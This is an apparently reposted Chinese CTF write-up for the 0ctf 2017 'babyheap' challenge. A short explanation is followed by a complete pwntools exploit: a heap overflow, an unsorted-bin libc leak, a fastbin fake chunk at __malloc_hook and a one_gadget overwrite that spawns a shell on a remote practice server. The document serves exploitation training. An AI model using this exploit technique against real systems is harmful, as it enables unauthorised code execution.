0ctf_2017_babyheap
Posted Nullan
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了0ctf_2017_babyheap相关的知识,希望对你有一定的参考价值。
思路
查看了一下ida后,发现有堆溢出漏洞
那可以利用unsorted bin 泄露main arena的地址,然后在malloc_hook处构造fake_chunk ,利用one_gadget在malloc_hook写入函数值,可以getshell
ps:注意本地libc的问题
exp及具体分析
from pwn import*
context.log_level = 'debug'
#p = process('./babyheap')
p = remote('node4.buuoj.cn','28992')
lib = ELF('./libc-2.23.so')
def alloc(size):
p.sendlineafter(': ','1')
p.sendlineafter(': ',str(size))
def edit(idx,size,content):
p.sendlineafter(': ','2')
p.sendlineafter(': ',str(idx))
p.sendlineafter(": ",str(size))
p.sendlineafter(": ",content)
def delete(idx):
p.sendlineafter(': ','3')
p.sendlineafter(': ',str(idx))
def show(idx):
p.sendlineafter(': ','4')
p.sendlineafter(': ',str(idx))
alloc(0x10)#0
alloc(0x20)#1
alloc(0x80)#2
alloc(0x10)#3
alloc(0x68)#4
alloc(0x50)#avoid topchunk
payload = p64(0)*3+p64(0xc1)
edit(0,len(payload),payload)#heap overflow
delete(1)
alloc(0xb0)#unsortedbin overlap
payload = p64(0)*5 + p64(0x91)
edit(1,len(payload),payload)
delete(2)
show(1)#show(1) can dump the content of chunk(2)
libc_base = u64(p.recvuntil('\\x7f')[-6:].ljust(8,'\\x00')) -0x3c4b78##0x3c4b78 is a abiding address of ubuntu16
malloc_hook = libc_base + lib.symbols['__malloc_hook']
delete(4)
payload = p64(0)*3 + p64(0x71)+ p64(malloc_hook-0x23)
edit(3,len(payload),payload)
alloc(0x68)#unsorted bin is FIFO
alloc(0x68)#malloc_hook - 0x23
one = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = libc_base + one[1]
payload = '\\x00'*0x13 + p64(one_gadget)
edit(4,len(payload),payload)#edit malloc_hook
#gdb.attach(p)
alloc(0x10)#getshell
#pause()
p.interactive()
以上是关于0ctf_2017_babyheap的主要内容,如果未能解决你的问题,请参考以下文章
FastBinAttack实战babyheap_0ctf_2017